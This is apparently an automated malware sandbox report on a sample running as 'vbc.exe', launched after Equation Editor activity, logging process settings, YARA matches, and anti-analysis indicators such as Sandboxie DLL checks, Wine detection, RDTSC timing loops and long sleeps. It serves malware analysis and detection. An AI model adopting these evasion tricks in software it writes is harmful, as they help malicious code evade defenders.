Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: Yara match	File source: 4.2.vbc.exe.2294dc8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.2235e50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.495847744.00000000021F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.495951937.0000000002280000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2200, type: MEMORYSTR

Source: vbc.exe, 00000004.00000002.495847744.00000000021F1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.495951937.0000000002280000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000004.00000002.495847744.00000000021F1000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.495951937.0000000002280000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000000D8604 second address: 00000000000D860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\rundll32.exe	RDTSC instruction interceptor: First address: 00000000000D899E second address: 00000000000D89A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 508	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2196	Thread sleep time: -33414s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 1992	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2420	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2100	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed